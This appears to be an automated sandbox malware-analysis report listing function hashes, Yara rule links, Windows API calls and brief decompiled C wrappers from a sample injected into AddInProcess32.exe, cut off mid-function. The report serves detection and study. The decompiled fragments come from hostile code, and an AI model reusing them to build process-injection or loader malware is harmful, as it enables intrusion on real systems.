ntin, xrefs: 0164E117
<, xrefs: 0164D8D4
(, xrefs: 0164DD3E

Memory Dump Source

Source File: 00000000.00000002.295892841.0000000001640000.00000040.00000001.sdmp, Offset: 01640000, based on PE: false

Similarity

API ID:
String ID: ($<$ntin
API String ID: 0-2777557274
Opcode ID: 84f0b68b26365bde4141b952122d137870e40f2333843d183467a634cb2427a0
Instruction ID: 7752cb8033cc19f05fa8aee845390522fc5de3048055e58ed9c7bc8a09820feb
Opcode Fuzzy Hash: 84f0b68b26365bde4141b952122d137870e40f2333843d183467a634cb2427a0
Instruction Fuzzy Hash: F7A2B174E002198FDB24CF99C981BDDBBB2BF89304F24C1A9D518AB355D734A982CF65

Uniqueness

Uniqueness Score: -1.00%

Function 02F11898, Relevance: 4.7, Strings: 3, Instructions: 969COMMON

Download Yara Rule

Strings

(, xrefs: 02F11F1E
<, xrefs: 02F11AB2
ntin, xrefs: 02F122F7

Memory Dump Source

Source File: 00000000.00000002.295955230.0000000002F10000.00000040.00000001.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000000.00000002.295943517.0000000002F00000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID: ($<$ntin
API String ID: 0-2777557274
Opcode ID: 38d8c94491b800b6ffba1c0c4445cb2209868e2537c0f7b0df91ffebb7c1b879
Instruction ID: 3cc113831308e41faca32f586ae5939468be10fb5acedb478d22c36b7d00aa42
Opcode Fuzzy Hash: 38d8c94491b800b6ffba1c0c4445cb2209868e2537c0f7b0df91ffebb7c1b879
Instruction Fuzzy Hash: 76A2B274E002298FDB14CF99C981BDDFBB2BF89304F649199DA08AB255D734AD81CF61

Uniqueness

Uniqueness Score: -1.00%

Function 016499C1, Relevance: 3.2, Strings: 2, Instructions: 650COMMON

Download Yara Rule

Strings

<, xrefs: 01649AF5
@, xrefs: 0164A2D5

Memory Dump Source

Source File: 00000000.00000002.295892841.0000000001640000.00000040.00000001.sdmp, Offset: 01640000, based on PE: false

Similarity

API ID:
String ID: <$@
API String ID: 0-1426351568
Opcode ID: 1fffa866127ad13bd46b69935c79511d93730ebc0c173a6cc9884179b8699b26
Instruction ID: 37d01fb9052ab4ee12036462fb72670394450f0e2092512548b0f2548d854c6f
Opcode Fuzzy Hash: 1fffa866127ad13bd46b69935c79511d93730ebc0c173a6cc9884179b8699b26
Instruction Fuzzy Hash: F462AB74A40229CFDB64CFA9C984ACEFBF2BF48715F15C1A9D809AB211D734A981CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0164EE1A, Relevance: 3.0, Strings: 2, Instructions: 454COMMON

Download Yara Rule

Strings

c=sl^, xrefs: 0164F3C8, 0164F3CD
S=sl^, xrefs: 0164F506, 0164F50B

Memory Dump Source

Source File: 00000000.00000002.295892841.0000000001640000.00000040.00000001.sdmp, Offset: 01640000, based on PE: false

Similarity

API ID:
String ID: S=sl^$c=sl^
API String ID: 0-346441954
Opcode ID: 873f165b09edea1b3216ec83b10d350cad1c2c9fc7bbbf1553a603278a7fca44
Instruction ID: d36d49132017b0bca449063c5aa9e3671ef1a6650621efd75111330c09e2d660
Opcode Fuzzy Hash: 873f165b09edea1b3216ec83b10d350cad1c2c9fc7bbbf1553a603278a7fca44
Instruction Fuzzy Hash: 5922D174E01228CFDB69DF79D9447ADBBB2FB49301F1084A9D50AA7390DB359A91CF10

Uniqueness

Uniqueness Score: -1.00%

Function 02F1359C, Relevance: 1.8, APIs: 1, Instructions: 253processCOMMON

Download Yara Rule

APIs

CreateProcessAsUserW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,02F14B0D,?,?,?), ref: 02F14DB4

Memory Dump Source

Source File: 00000000.00000002.295955230.0000000002F10000.00000040.00000001.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000000.00000002.295943517.0000000002F00000.00000004.00000001.sdmp Download File

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: 9cab609637ffcb0ec519f93c6031386cf42b253f8a77aee616bb048b7d99d77b
Instruction ID: e3378fde41816bd6a4821e7cc63546a1ce48a70fc9963b9c1a51d23dc901726b
Opcode Fuzzy Hash: 9cab609637ffcb0ec519f93c6031386cf42b253f8a77aee616bb048b7d99d77b
Instruction Fuzzy Hash: 4391DEB5D0422D9FCF21CFA4C880BDEBBB1BB49304F5590A9E549B7210DB70AA85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 02F11168, Relevance: 1.7, Strings: 1, Instructions: 482COMMON

Download Yara Rule

Strings

jN, xrefs: 02F1123E

Memory Dump Source

Source File: 00000000.00000002.295955230.0000000002F10000.00000040.00000001.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000000.00000002.295943517.0000000002F00000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID: jN
API String ID: 0-1675516797
Opcode ID: 88d33b781e6b040158a6cc6f6f767a5bb00eda06fdf82e50d9f3a3cc803dd465
Instruction ID: 84976af13e69dc703bf987eee4b2930b80047adea1d21dd46d07fe8ba657c651
Opcode Fuzzy Hash: 88d33b781e6b040158a6cc6f6f767a5bb00eda06fdf82e50d9f3a3cc803dd465
Instruction Fuzzy Hash: A532E1B0910219CFDB54DFA9C984A8EFBB2BF48755F55C5A9C60CAB211CB30D981CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01643F90, Relevance: .9, Instructions: 918COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.295892841.0000000001640000.00000040.00000001.sdmp, Offset: 01640000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4c36f09f4b9ba8502281ca9ba709d49674af5d95a0e6f4e5c42b5261e49dd65
Instruction ID: 1d2e5d55f35ad7101c10088f64a5eff47e74842e5440a70c15d3f510a12f479d
Opcode Fuzzy Hash: e4c36f09f4b9ba8502281ca9ba709d49674af5d95a0e6f4e5c42b5261e49dd65
Instruction Fuzzy Hash: B3727B70A002199FDB15DFA9C885BAEBBB2BF88344F158069E915EB365DF34DC42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 016476B0, Relevance: .9, Instructions: 891COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.295892841.0000000001640000.00000040.00000001.sdmp, Offset: 01640000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddf4943a037d4d2e9aeb20ada6bdb617c9ad776b6c4f64b5173688bef978aca7
Instruction ID: 1dd562045f1e05b725105d29b43c0dde3a1db2749b5bce9ae24ad1136bccbd29
Opcode Fuzzy Hash: ddf4943a037d4d2e9aeb20ada6bdb617c9ad776b6c4f64b5173688bef978aca7
Instruction Fuzzy Hash: F4829F35A00209DFCB15CFA8C984AAEBBF6FF88304F158569E905DB362D731E991CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0164BBE8, Relevance: .5, Instructions: 513COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.295892841.0000000001640000.00000040.00000001.sdmp, Offset: 01640000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60b7e4049898debbc747c17c149c2a89f1d4287957acfe92001ecd1e0b0cc7a6
Instruction ID: 9a7c7b4c1225423cbeeac4602cbe657f6a20b416248bff34e1acd5fa0ff4a702
Opcode Fuzzy Hash: 60b7e4049898debbc747c17c149c2a89f1d4287957acfe92001ecd1e0b0cc7a6
Instruction Fuzzy Hash: 01429074E01229CFDB64CFA9C984B9DBBB2FF48310F5485A9E809A7355D731AA81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0164A4B9, Relevance: .5, Instructions: 507COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.295892841.0000000001640000.00000040.00000001.sdmp, Offset: 01640000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95491e7671b2054dc015f21c2bafccc9746dee0b146a2a685b758c26439611ef
Instruction ID: 29f2ff4706aa3c7a63ee15e2d75c684ce555f0e8db794507407a41969999ace3
Opcode Fuzzy Hash: 95491e7671b2054dc015f21c2bafccc9746dee0b146a2a685b758c26439611ef
Instruction Fuzzy Hash: D232D074910219DFEB60DFA9C984A8EFBB2FF48715F55C599C409AB211CB30D981CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0164F618, Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.295892841.0000000001640000.00000040.00000001.sdmp, Offset: 01640000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 732d19e6dbd6fe730f19555888dc70e15fed21aaa04047ff8eed7a49ab880f6f
Instruction ID: 30527e7a9fd3c234f8c4f867ed5542a43923870f487b004255fbba105d18aa52
Opcode Fuzzy Hash: 732d19e6dbd6fe730f19555888dc70e15fed21aaa04047ff8eed7a49ab880f6f
Instruction Fuzzy Hash: 9FD1CE74E00228CFDB54DFA9D984B9DBBB2FF88304F1085AAD849A7355EB305A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0164F608, Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.295892841.0000000001640000.00000040.00000001.sdmp, Offset: 01640000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b55df3c7085c0de3a196f29c9ca119f0a87a396c39c0cca88a557ca4f0bd4863
Instruction ID: d04a7fbc50d1da4db57169be0c0fc95139c27b07a5f4fa0daf3a776d41bda404
Opcode Fuzzy Hash: b55df3c7085c0de3a196f29c9ca119f0a87a396c39c0cca88a557ca4f0bd4863
Instruction Fuzzy Hash: F3A1DF74E00618CFDB54EFA9D944B9DFBB2FF88304F1085AAD449AB254EB305A99CF11

Uniqueness

Uniqueness Score: -1.00%

Function 0164A3B1, Relevance: 1.6, APIs: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0164A45F

Memory Dump Source

Source File: 00000000.00000002.295892841.0000000001640000.00000040.00000001.sdmp, Offset: 01640000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 38550f40a6042f6836fd813bc4d22dfc9b74437205d86e0761e12e6dfec35843
Instruction ID: 7ec8553ee57057803371158a95f22a9b714cce192e20c669e574ae45d2fb4a12
Opcode Fuzzy Hash: 38550f40a6042f6836fd813bc4d22dfc9b74437205d86e0761e12e6dfec35843
Instruction Fuzzy Hash: 223198B9D05258AFCB10CFA9D884ADEFBB5AB49310F14902AE815B7310D774A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0164E4B2, Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0164E55F

Memory Dump Source

Source File: 00000000.00000002.295892841.0000000001640000.00000040.00000001.sdmp, Offset: 01640000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 15d5016e9e1e2d85b2e2910211e7d237942eea7ae84f142d6e8f4bdc9d085958
Instruction ID: 93cf6496018205240d705ce7ecfff97e1b56dbe9b0433ced47bb79afd853b6d6
Opcode Fuzzy Hash: 15d5016e9e1e2d85b2e2910211e7d237942eea7ae84f142d6e8f4bdc9d085958
Instruction Fuzzy Hash: B23198B5D042589FCB14CFA9E984ADEFBB5BB19310F14902AE814B7310D735A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0164A3B8, Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0164A45F

Memory Dump Source

Source File: 00000000.00000002.295892841.0000000001640000.00000040.00000001.sdmp, Offset: 01640000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 4f5206784d8af402acc2edc8fda15005b587ba53d12ecda077a54d26fd324ca8
Instruction ID: b558b7df20ccabb8220149b508144783d3ae75204242dc6f281d7b75e62d379d
Opcode Fuzzy Hash: 4f5206784d8af402acc2edc8fda15005b587ba53d12ecda077a54d26fd324ca8
Instruction Fuzzy Hash: 053198B9D05258AFCF10CFA9E884ADEFBB5BB49320F14902AE815B7310D734A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0164E4B8, Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0164E55F

Memory Dump Source

Source File: 00000000.00000002.295892841.0000000001640000.00000040.00000001.sdmp, Offset: 01640000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: a276dc511a37b0d65588b28b7a2a734bcdcb39b6d69ecdd0ba14b2add6a3bdb5
Instruction ID: df7f1d0f697c3455a3cdedf8be5cded27470e00fdfbe277c6e33519549e26919
Opcode Fuzzy Hash: a276dc511a37b0d65588b28b7a2a734bcdcb39b6d69ecdd0ba14b2add6a3bdb5
Instruction Fuzzy Hash: A03198B9D042589FCF14CFA9E984AEEFBB0BB09310F14902AE814B7310D735A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0164AE4C, Relevance: 1.6, APIs: 1, Instructions: 86fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?), ref: 0164EC11

Memory Dump Source

Source File: 00000000.00000002.295892841.0000000001640000.00000040.00000001.sdmp, Offset: 01640000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: ed1fc0856c3fc3bb062a5a70dd830410cbe4295412d169b301d1a5b6169a47dc
Instruction ID: 109242befeea388faa78642f502ad8e007b313101c9418ba86dbb1e249f82f3c
Opcode Fuzzy Hash: ed1fc0856c3fc3bb062a5a70dd830410cbe4295412d169b301d1a5b6169a47dc
Instruction Fuzzy Hash: E431D8B4D052189FDB10CFA9D984AEEFBF1BB49314F14806AE419B7310D338AA45CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0164EB70, Relevance: 1.6, APIs: 1, Instructions: 85fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?), ref: 0164EC11

Memory Dump Source

Source File: 00000000.00000002.295892841.0000000001640000.00000040.00000001.sdmp, Offset: 01640000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 7d1ae0e9afe74e39fb923ed05f13d45e47bde03456f9bc6feaf5ee0e0517f86f
Instruction ID: 80de63d1b5f17c16db57b4208455fce32db9fab7c84ed3cd43a57d683cf45c0e
Opcode Fuzzy Hash: 7d1ae0e9afe74e39fb923ed05f13d45e47bde03456f9bc6feaf5ee0e0517f86f
Instruction Fuzzy Hash: 8531DBB4D012189FCB10CFA9D984AEEFBF5BB49314F14846AE415B7310D338AA45CFA5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02F12E78, Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.295955230.0000000002F10000.00000040.00000001.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000000.00000002.295943517.0000000002F00000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15a63180d6bac7a550c14a30ad950f3dd741e63406a313085ba3c456fa88a6ed
Instruction ID: 0c1c09b86b510070a31a8596d640db89fc40c8ac7622847bc00782d2778364c3
Opcode Fuzzy Hash: 15a63180d6bac7a550c14a30ad950f3dd741e63406a313085ba3c456fa88a6ed
Instruction Fuzzy Hash: B0E10674E002598FCB14DFA9C580AAEFBB2FF89304F2481A9D914AB355D735AD41CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02F12A00, Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.295955230.0000000002F10000.00000040.00000001.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000000.00000002.295943517.0000000002F00000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9656552a4f6ac28b61d06cfed4cee46cb38ac522eb363607edd749e3209d1725
Instruction ID: 119f9e22058d3d77ed27d4ba48960a1db764988a0647c6ed531e0a5809637f5b
Opcode Fuzzy Hash: 9656552a4f6ac28b61d06cfed4cee46cb38ac522eb363607edd749e3209d1725
Instruction Fuzzy Hash: 0DE10874E002298FCB14CFA9C580AADFBB2FF89305F648169D914AB355D735AD41CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02F048A2, Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.295943517.0000000002F00000.00000004.00000001.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000000.00000002.295955230.0000000002F10000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53bd9aab08806a835148cc50da9a487027701bd280a7de644b1846a1fa899090
Instruction ID: deb419d10c2d381a45032810f4b398e1b24d77534ad1344d4d9126c9bb581aa2
Opcode Fuzzy Hash: 53bd9aab08806a835148cc50da9a487027701bd280a7de644b1846a1fa899090
Instruction Fuzzy Hash: 81A127A248E3C14FC7038B704C795827FB1AE23214B1E85EFD4C58E4A3E29D558AD723

Uniqueness

Uniqueness Score: -1.00%

Function 02F063AB, Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.295943517.0000000002F00000.00000004.00000001.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000000.00000002.295955230.0000000002F10000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dce579aaab4ef222cfcce15eadca896d17895a999a7971bfd87b45dd39ee6be
Instruction ID: 67bf76e3b16bfb1427a46297b801cb35462f5baca6da1363e57e1d510fcf935b
Opcode Fuzzy Hash: 7dce579aaab4ef222cfcce15eadca896d17895a999a7971bfd87b45dd39ee6be
Instruction Fuzzy Hash: 7E816C7294D3C14BDB068F7448BA2C2BFB0AE1322431E86EECCD54E597D25E514BDB62

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: AddInProcess32.exe PID: 6548 Parent PID: 6744 AddInProcess32.exeCOMMON

Executed Functions

Function 00419E0B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55

Strings

BMA, xrefs: 00419E32, 00419E40
BMA, xrefs: 00419E4D, 00419E54

Memory Dump Source

Source File: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: c7544984bce2b1c87228a47735bc187059da444aa0750dbd48748f4aae0cb5ec
Instruction ID: 4fe5b75dff92a1ce98cba4ca99c9955512d9511116462172522007c39aeb3aaa
Opcode Fuzzy Hash: c7544984bce2b1c87228a47735bc187059da444aa0750dbd48748f4aae0cb5ec
Instruction Fuzzy Hash: 94F0F4B2200108AFCB04CF99DC80EEB77ADEF8C354F158249BE0DE7251C630E8518BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A960(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00419e13
0x00419e1f
0x00419e27
0x00419e32
0x00419e4d
0x00419e55
0x00419e59

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55

Strings

BMA, xrefs: 00419E32, 00419E40
BMA, xrefs: 00419E4D, 00419E54

Memory Dump Source

Source File: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419D5D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419D5D(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, signed char _a21, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t23;
				void* _t33;

				_a21 = _a21 >> 0x55;
				_t17 = _a4;
				_t5 = _t17 + 0xc40; // 0xc40
				E0041A960(_t33, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t23 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t23;
			}

0x00419d5d
0x00419d63
0x00419d6f
0x00419d77
0x00419dad
0x00419db1

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD

Strings

U, xrefs: 00419D5D

Memory Dump Source

Source File: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID: U
API String ID: 823142352-3372436214
Opcode ID: b48e8af83ab1fa7129cf3a856df758814241a1d67651ffac608d92b04c3818d4
Instruction ID: 0ecc1f259e353f1aedd2b6da1ffd1d6813b637172127a466756acdc956f94e33
Opcode Fuzzy Hash: b48e8af83ab1fa7129cf3a856df758814241a1d67651ffac608d92b04c3818d4
Instruction Fuzzy Hash: FE01B2B2215208ABCB08CF88DC95EEB37E9AF8C754F158248FA1D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_t24 = _a8;
				_v8 =  &_v536;
				_t15 = E0041C650( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CA70(_v8, _t24, __eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CCF0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041AEA0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x0040acd9
0x0040acec
0x0040acef
0x0040acf4
0x0040acf9
0x0040ad03
0x0040ad08
0x0040ad0b
0x0040ad0d
0x0040ad15
0x0040ad1a
0x0040ad1a
0x0040ad21
0x0040ad29
0x0040ad2c
0x0040ad2e
0x0040ad42
0x00000000
0x0040ad44
0x0040ad4a
0x0040acfe
0x0040acfe
0x0040acfe

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42

Memory Dump Source

Source File: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96

Uniqueness

Uniqueness Score: -1.00%

Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A960(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x00419d6f
0x00419d77
0x00419dad
0x00419db1

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD

Memory Dump Source

Source File: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x00419f4f
0x00419f57
0x00419f79
0x00419f7d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79

Memory Dump Source

Source File: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419F3A, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419F3A(void* __edi, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t15;

				_t11 = _a4;
				_t4 = _t11 + 0xc60; // 0xca0
				E0041A960(__edi, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t15;
			}

0x00419f43
0x00419f4f
0x00419f57
0x00419f79
0x00419f7d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79

Memory Dump Source

Source File: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 682d6b885e45ad76fd35cb9bb74e427a11a0dbe06507175c4967a2f38414feb7
Instruction ID: c4c91673f55cdf50b03d191e349a7edbbfd871b75a73db9cce2fdc9c7bb0b878
Opcode Fuzzy Hash: 682d6b885e45ad76fd35cb9bb74e427a11a0dbe06507175c4967a2f38414feb7
Instruction Fuzzy Hash: A4F01CB1210209AFCB14DF99CC81EE7B7ADEF88754F158549FE5C97241C630E921CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419E8A, Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00419E8A(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t12;

